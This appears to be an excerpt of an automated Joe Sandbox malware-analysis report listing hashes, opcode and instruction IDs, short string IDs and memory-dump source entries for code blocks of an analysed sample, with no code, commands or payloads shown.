                                                                                                                                                                                                                                                                                      • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                                      • Instruction ID: 5ab83903e5e19c4238e620f9a0cb7adc1d5992d24ea920b69a0b2daf2c890554
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4A1F5B46087918FD326CF39C4A0A62BFE1EF57204B1986ADC4E24FB66D339D405CB15
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: BE$de
                                                                                                                                                                                                                                                                                      • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                                      • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                                      • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: BE$de
                                                                                                                                                                                                                                                                                      • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                                      • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                                      • Instruction ID: d4547235d9d9c015f05970d1daac53b72a454e7ba82df4a8f7ce07e2e776095d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D12A7164C3644BD728DF2888616AFFBE2EFD1208F18492DE8D19B391D775C906CB82
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID: @$ihgf
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                                                                      • Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                                                      • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: @$ihgf
                                                                                                                                                                                                                                                                                      • API String ID: 0-73152791
                                                                                                                                                                                                                                                                                      • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                                      • Instruction ID: ad871adc90c38221081cab6931d7c89faaf8633b1c441c94448c1023ba0a2959
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A4113B1A043118BD714CF24C8A177BB7E2FFD2328F14862EE4959B390E7359905CB82
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: Z\$^P
                                                                                                                                                                                                                                                                                      • API String ID: 0-3724859648
                                                                                                                                                                                                                                                                                      • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                                      • Instruction ID: 814d97f66e8dcbd77c6b29fa727e2e8c3803f385887a61436a1b32d5f4ae2adc
• Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
• Instruction Fuzzy Hash: 3941E0B1A11600CFC719CF28C8A1AA3B7B2FF59314B06819DD49A8F7A4E778E401CB65
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: AzB$`rB
• API String ID: 0-365317308
• Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
• Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
• Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
• Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: AzB$`rB
• API String ID: 0-365317308
• Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
• Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
• Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
• Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: c$
• API String ID: 0-2516980088
• Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
• Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
• Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
• Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: A67H
• API String ID: 0-3389657328
• Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
• Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
• Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
• Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
Strings
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: [
• API String ID: 0-3878419350
• Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
• Instruction ID: b21cc2b050115c7623b6ec1a958cf1466b81d274976b46cd1ee1cdbbc96f4999
• Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
• Instruction Fuzzy Hash: 05022075600702CBCB25CF29C8D16A3B7F2FF99314B19959DC5864FBA5EB39A402CB60
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: ,)*k
• API String ID: 2994545307-1228391949
• Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
• Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
• Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
• Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,)*k
• API String ID: 0-1228391949
• Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
• Instruction ID: 4a2ef8966b13bb965d553df0408a37cdfc8c3a2d46ad8e213b6e521951f9e701
• Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
• Instruction Fuzzy Hash: 98C15775A083505BD324DF61C8A0A3FFBE6ABD6718F198A2EE5C657780D7319C41CB82
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: m
                                                                                                                                                                                                                                                                                      • API String ID: 0-3775001192
                                                                                                                                                                                                                                                                                      • Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                                                      • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID: 167H
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                                                                      • Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                                                      • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 167H
                                                                                                                                                                                                                                                                                      • API String ID: 0-2704650348
                                                                                                                                                                                                                                                                                      • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                                      • Instruction ID: 1848d3e661a793a4af85317c448d25518d628e75742eb23768de9142239a0ef6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91D1877A6043004BD758CF2DCC816AFB792EFD1324F69862EE985A73C1D734A906CB81
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                                                                                                      • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                                      • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                                      • Instruction ID: 54d3a9570cf4d68481e54b2de5fe4d32e5bb460f2895a1ee213923ea04653f6f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2C107B5D002128FCB25CF29C8916BBB7B1FF95310F19825ED895AB790E734A841CBA0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                                                                                                      • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                                      • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                                      • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &#
                                                                                                                                                                                                                                                                                      • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                                      • Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                                      • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: &#
• API String ID: 0-1789715784
• Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
• Instruction ID: e9cbaca9c4728d26de5190838a0e04f5b42803e8121f648c006889b47ec6351a
• Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
• Instruction Fuzzy Hash: B1A177B66042104BD768DB2DCC9267BB3E1EF91324F19892EED869B390E3F4D901C752
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-1505114982
• Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
• Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
• Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
• Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
Strings
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: de
• API String ID: 0-2106599819
• Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
• Instruction ID: fb76e698103ca9641ec9cec8879ee2b42d8999e7d381ba6384554f8e6907a449
• Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
• Instruction Fuzzy Hash: 919121719083118AC324DF68C8D27ABB7F2EFD1324F18992EE4D64B791E7788505C7A2
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
• Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
• Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
• Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
• Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
• Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
• Instruction ID: 9a6f2ea86ece29586c413c5c9cc3749fe809bcf846d24a8592aab4b765827bae
• Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
• Instruction Fuzzy Hash: 3DA13972E042619FC725CE28CC906ABB7E1AF95324F19827EECA9973D1D7319806C7D1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: RpB
• API String ID: 0-664042118
• Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
• Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
• Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
• Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: d1
• API String ID: 0-4211392460
• Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
• Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
• Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
• Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: c$
• API String ID: 0-2516980088
• Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
• Instruction ID: 0445c2a5cbad396e7d72b25a3499ff526ebf231c6b3cee2b4dacbbd5a4108d0a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16918AB1100741CFD7658F25C4A07A3BBB1FF86318F15958DC4864FBA1E379A846CBA4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                                      • Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                                                      • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
